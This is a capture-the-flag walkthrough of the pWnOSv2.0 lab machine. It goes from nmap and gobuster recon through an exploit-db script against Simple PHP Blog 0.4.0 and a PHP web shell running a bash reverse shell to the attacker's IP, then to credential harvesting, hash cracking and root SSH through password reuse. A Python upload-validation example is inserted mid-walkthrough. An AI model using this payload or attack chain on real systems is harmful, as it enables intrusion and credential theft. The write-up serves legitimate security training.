pWnOSv2.0

Host discovery

└─$ sudo nmap -sn 10.10.10.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 06:06 EDT
Nmap scan report for 10.10.10.1
Host is up (0.00037s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00026s latency).
MAC Address: 00:50:56:E3:2D:B4 (VMware)
Nmap scan report for 10.10.10.100
Host is up (0.00029s latency).
MAC Address: 00:0C:29:80:77:B8 (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00016s latency).
MAC Address: 00:50:56:F4:2A:5D (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.04 seconds

Port scan

└─$ sudo nmap --min-rate 10000 -p- 10.10.10.100 -oA nmapscan/ports
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 06:08 EDT
Nmap scan report for 10.10.10.100
Host is up (0.00086s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:80:77:B8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 4.32 seconds

TCP

└─$ sudo nmap -sT -sV -sC -O -p22,80 10.10.10.100 -oA nmapscan/detail
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 06:08 EDT
Nmap scan report for 10.10.10.100
Host is up (0.00043s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
|   2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_  256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
|_http-title: Welcome to this Site!
|_http-server-header: Apache/2.2.17 (Ubuntu)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
MAC Address: 00:0C:29:80:77:B8 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.32 - 2.6.39
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.94 seconds

UDP

└─$ sudo nmap -sU -p22,80 10.10.10.100 -oA nmapscan/udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 06:09 EDT
Nmap scan report for 10.10.10.100
Host is up (0.00032s latency).

PORT   STATE  SERVICE
22/udp closed ssh
80/udp closed http
MAC Address: 00:0C:29:80:77:B8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds

Nmap vulnerability scan

└─$ sudo nmap --script=vuln -p22,80 10.10.10.100 -oA nmapscan/vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 06:09 EDT
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.100
Host is up (0.00043s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.100
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://10.10.10.100:80/login.php
|     Form id:
|     Form action: login.php
|
|     Path: http://10.10.10.100:80/register.php
|     Form id:
|_    Form action: register.php
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-cookie-flags:
|   /:
|     PHPSESSID:
|       httponly flag not set
|   /login.php:
|     PHPSESSID:
|       httponly flag not set
|   /login/:
|     PHPSESSID:
|       httponly flag not set
|   /index/:
|     PHPSESSID:
|       httponly flag not set
|   /register/:
|     PHPSESSID:
|_      httponly flag not set
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|   /blog/: Blog
|   /login.php: Possible admin folder
|   /login/: Login page
|   /info.php: Possible information file
|   /icons/: Potentially interesting folder w/ directory listing
|   /includes/: Potentially interesting directory w/ listing on 'apache/2.2.17 (ubuntu)'
|   /index/: Potentially interesting folder
|   /info/: Potentially interesting folder
|_  /register/: Potentially interesting folder
MAC Address: 00:0C:29:80:77:B8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 56.01 seconds

Attack path

Web penetration

Directory brute-forcing

└─$ sudo gobuster dir -u http://10.10.10.100 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.100
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/07/24 06:11:36 Starting gobuster in directory enumeration mode
===============================================================
/register             (Status: 200) [Size: 1562]
/login                (Status: 200) [Size: 1174]
/blog                 (Status: 301) [Size: 311] [--> http://10.10.10.100/blog/]
/includes             (Status: 301) [Size: 315] [--> http://10.10.10.100/includes/]
/info                 (Status: 200) [Size: 49873]
/index                (Status: 200) [Size: 854]
/activate             (Status: 302) [Size: 0] [--> http://10.10.10.100/index.php]
/server-status        (Status: 403) [Size: 293]
===============================================================
2023/07/24 06:11:48 Finished
===============================================================

The /blog page looks like a content management system, so fingerprint it:

└─$ whatweb http://10.10.10.100/blog
http://10.10.10.100/blog [301 Moved Permanently] Apache[2.2.17], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.2.17 (Ubuntu)], IP[10.10.10.100], RedirectLocation[http://10.10.10.100/blog/], Title[301 Moved Permanently]
http://10.10.10.100/blog/ [200 OK] Apache[2.2.17], Country[RESERVED][ZZ], DublinCore, HTTPServer[Ubuntu Linux][Apache/2.2.17 (Ubuntu)], IP[10.10.10.100], Meta-Author[No Author], MetaGenerator[Simple PHP Blog 0.4.0], PHP[5.3.5-1ubuntu7], PoweredBy[PHP,Plain,Simple], Script[JavaScript], Title[No Title], X-Powered-By[PHP/5.3.5-1ubuntu7]

whatweb identifies Simple PHP Blog 0.4.0; look up its known vulnerabilities

└─$ searchsploit Simple PHP Blog 0.4.0
-------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                        |  Path
-------------------------------------------------------------------------------------- ---------------------------------
Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities      | cgi/webapps/26463.txt
Simple PHP Blog 0.4 - 'preview_cgi.php' Multiple Cross-Site Scripting Vulnerabilities | cgi/webapps/26461.txt
Simple PHP Blog 0.4 - 'preview_static_cgi.php' Multiple Cross-Site Scripting Vulnerab | cgi/webapps/26462.txt
Simple PHP Blog 0.4.0 - Multiple Remote s                                             | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)                         | php/webapps/16883.rb
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/Desktop/pWnOSv2.0]
└─$ searchsploit Simple PHP Blog 0.4.0 -m 1191
[!] Could not find EDB-ID #

[!] Could not find EDB-ID #

[!] Could not find EDB-ID #

[!] Could not find EDB-ID #0

  Exploit: Simple PHP Blog 0.4.0 - Multiple Remote s
      URL: https://www.exploit-db.com/exploits/1191
     Path: /usr/share/exploitdb/exploits/php/webapps/1191.pl
    Codes: OSVDB-19070, CVE-2005-2787, OSVDB-19012, CVE-2005-2733, OSVDB-17779, CVE-2005-2192
 Verified: True
File Type: Perl script text executable
Copied to: /home/kali/Desktop/pWnOSv2.0/1191.pl

The script's usage is as follows

        Usage   : $0 [-h host] [-e exploit]

                -?      : this menu
                -h      : host
                -e      : exploit
                        (1)     : Upload cmd.php in [site]/images/
                        (2)     : Retreive Password file (hash)
                        (3)     : Set New User Name and Password
                                [NOTE - uppercase switches for exploits]
                                -U      : user name
                                -P      : password
                        (4)     : Delete a System File
                                -F      : Path and System File

        Examples: $0 -h 127.0.0.1 -e 2
                  $0 -h 127.0.0.1 -e 3 -U l33t -P l33t
                  $0 -h 127.0.0.1 -e 4 -F ./index.php
                  $0 -h 127.0.0.1 -e 4 -F ../../../etc/passwd
                  $0 -h 127.0.0.1 -e 1

Try adding a user

└─$ perl 1191.pl -h http://10.10.10.100/blog -e 3 -U test -P test
Can't locate Switch.pm in @INC (you may need to install the Switch module) (@INC contains: /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.36.0 /usr/local/share/perl/5.36.0 /usr/lib/x86_64-linux-gnu/perl5/5.36 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl-base /usr/lib/x86_64-linux-gnu/perl/5.36 /usr/share/perl/5.36 /usr/local/lib/site_perl) at 1191.pl line 146.
BEGIN failed--compilation aborted at 1191.pl line 146.

It errors out: the Perl Switch module is missing, so install it

sudo apt install libswitch-perl

Verify that the user can now be added

perl 1191.pl -h http://10.10.10.100/blog -e 3 -U test -P test
________________________________________________________________________________
                  SimplePHPBlog v0.4.0 Exploits
                             by
                     Kenneth F. Belva, CISSP
                    http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....

Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: test
Password is set to: test

*** Exploit Completed....
Have a nice day! :)

The user was added; try logging in to the admin backend

Login succeeded. The "upload image" feature accepts arbitrary files, so write a one-line PHP web shell and try uploading it

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.128/443 0>&1'"); ?>
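The upload succeeded because the image handler trusted the file name and content as sent. As an added defensive example (not code from the original write-up or from Simple PHP Blog), the Python validator below shows the server-side checks that would have rejected it: an extension allowlist, a double-extension check, magic bytes matched against the declared type, and a scan for PHP open tags. The extension set, regex, PHP stub and PNG header sample are all constructed for this example.

```python
"""Server-side checks for an 'upload image' handler.

Added example, not part of the original write-up or of Simple PHP Blog.
It rejects the path taken above: a .php file (or PHP hidden behind an image
extension) stored where the web server will execute it. It complements,
rather than replaces, serving the upload directory with no PHP handler.
"""
import os
import re
import secrets

# Extension allowlist mapped to the magic bytes each format must start with.
ALLOWED_SIGNATURES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Extensions commonly mapped to mod_php; refuse them anywhere in the name
# so that shell.php.png is caught as well as shell.php.
PHP_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}
# Open tags PHP 5.x will execute (short_open_tag is assumed off).
PHP_TAG_RE = re.compile(rb"<\?php|<\?=|<script[^>]*language\s*=\s*[\"']?php", re.I)
MAX_UPLOAD_BYTES = 5 * 1024 * 1024


def validate_image_upload(filename: str, data: bytes) -> tuple:
    """Return (accepted, reason); every check must pass for acceptance."""
    # Drop any client-supplied directory part; only the basename matters.
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if not data:
        return False, "empty file"
    if len(data) > MAX_UPLOAD_BYTES:
        return False, "file too large"
    if ext not in ALLOWED_SIGNATURES:  # also rejects .htaccess (no extension)
        return False, f"extension {ext or '(none)'} not allowed"
    if any(seg in PHP_EXTS for seg in base.lower().split(".")[1:-1]):
        return False, "suspicious double extension"
    if not data.startswith(ALLOWED_SIGNATURES[ext]):
        return False, "content does not match declared image type"
    if PHP_TAG_RE.search(data):
        return False, "embedded PHP open tag"
    return True, "ok"


def safe_store_name(ext: str) -> str:
    """Random server-chosen name: the uploader cannot predict the stored URL."""
    return secrets.token_hex(16) + ext.lower()


if __name__ == "__main__":
    # Constructed samples (not files from the target): a harmless PHP stub
    # under several names, and a minimal PNG header standing in for an image.
    php_stub = b"<?php echo 'hello'; ?>"
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    for name, blob in [("shell.php", php_stub), ("shell.png", php_stub),
                       ("shell.php.png", png), ("photo.png", png + php_stub),
                       ("photo.png", png)]:
        ok, why = validate_image_upload(name, blob)
        print(f"{name:14} {'accept' if ok else 'reject'}: {why}")
```

A production handler would additionally decode the image (for example with an image library) and re-encode it, which strips payloads hidden past the header.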

The upload succeeded; catch the reverse shell

└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.100] 37008
bash: no job control in this shell
www-data@web:/var/www/blog/images$ whoami
whoami
www-data
www-data@web:/var/www/blog/images$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
www-data@web:/var/www/blog/images$ uname -a
uname -a
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
www-data@web:/var/www/blog/images$

Host enumeration

www-data@web:/var/www/blog/images$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:0:0:MySQL Server,,,:/root:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:104:110::/var/lib/landscape:/bin/false
dan:x:1000:1000:Dan Privett,,,:/home/dan:/bin/bash
www-data@web:/var/www/blog/images$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied
www-data@web:/var/www/blog/images$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

Look around for interesting files

www-data@web:/var/www$ ls -liah
ls -liah
total 44K
263594 drwxr-xr-x  4 root root 4.0K May  9  2011 .
261633 drwxr-xr-x 16 root root 4.0K May  7  2011 ..
261763 -rw-r--r--  1 root root 1.4K Mar 24  2008 activate.php
261648 drwxrwxrwx 11 root root 4.0K May  9  2011 blog
261758 drwxr-xr-x  2 root root 4.0K May  7  2011 includes
261764 -rw-r--r--  1 root root  629 May  7  2011 index.php
261765 -rw-r--r--  1 root root   23 Apr  3  2008 info.php
261766 -rw-r--r--  1 root root 3.1K May  7  2011 login.php
261767 -rw-r--r--  1 root root  516 Apr  2  2008 mysqli_connect.php
261768 -rw-r--r--  1 root root 4.6K Apr  2  2008 register.php
www-data@web:/var/www$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

?>www-data@web:/var/www$

This reveals the database username and password root:goodday; try them over SSH

└─$ ssh root@10.10.10.100
The authenticity of host '10.10.10.100 (10.10.10.100)' can't be established.
ECDSA key fingerprint is SHA256:EWPtTr0Xn9NMudUhcD3+AMXSigXAGS4uldZp3grLm8w.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.100' (ECDSA) to the list of known hosts.
root@10.10.10.100's password:
Permission denied, please try again.

That failed; try logging in to the database instead

www-data@web:/var/www$ mysql -uroot -pgoodday
mysql -uroot -pgoodday
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)

That failed too, which shouldn't happen; use find to locate other copies of the database connection file

www-data@web:/var/www$ find / -name mysqli_connect.php 2>/dev/null
find / -name mysqli_connect.php 2>/dev/null
/var/mysqli_connect.php
/var/www/mysqli_connect.php

www-data@web:/var/www$ cat /var/mysqli_connect.php
cat /var/mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

?>www-data@web:/var/www$

This gives a new database username and password, root:root@ISIntS; try logging in to MySQL

www-data@web:/var/www$ mysql -uroot -proot@ISIntS
mysql -uroot -proot@ISIntS
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 43
Server version: 5.1.54-1ubuntu4 (Ubuntu)

Copyright (c) 2000, 2010, Oracle and/or its affiliates. All rights reserved.
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL v2 license

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

Login succeeded

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| ch16               |
| mysql              |
+--------------------+
3 rows in set (0.00 sec)

mysql> use ch16
use ch16
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+----------------+
| Tables_in_ch16 |
+----------------+
| users          |
+----------------+
1 row in set (0.00 sec)

mysql> select * from users;
select * from users;
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
| user_id | first_name | last_name | email            | pass                                     | user_level | active | registration_date   |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
|       1 | Dan        | Privett   | admin@isints.com | c2c4b4e51d9e23c02c15702c136c3e950ba9a4af |          0 | NULL   | 2011-05-07 17:27:01 |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
1 row in set (0.00 sec)

mysql>

Try cracking the password hash

└─$ hash-identifier 'c2c4b4e51d9e23c02c15702c136c3e950ba9a4af'
Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

It is probably an unsalted SHA-1 hash; an online lookup returns the following

c2c4b4e51d9e23c02c15702c136c3e950ba9a4af:killerbeesareflying

Try it over SSH

└─$ ssh dan@10.10.10.100
dan@10.10.10.100's password:
Permission denied, please try again.

Login failed

root:root@ISIntS has not been tried over SSH yet; see whether the database password is reused

└─$ ssh root@10.10.10.100
root@10.10.10.100's password:
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)

 * Documentation:  http://www.ubuntu.com/server/doc

  System information as of Mon May 29 15:32:11 EDT 2023

  System load:  0.0               Processes:           82
  Usage of /:   2.9% of 38.64GB   Users logged in:     0
  Memory usage: 31%               IP address for eth0: 10.10.10.100
  Swap usage:   0%

  Graph this data and manage this system at https://landscape.canonical.com/
Last login: Mon May  9 19:29:03 2011
root@web:~# ls
root@web:~# whoami
root

🐂🍺
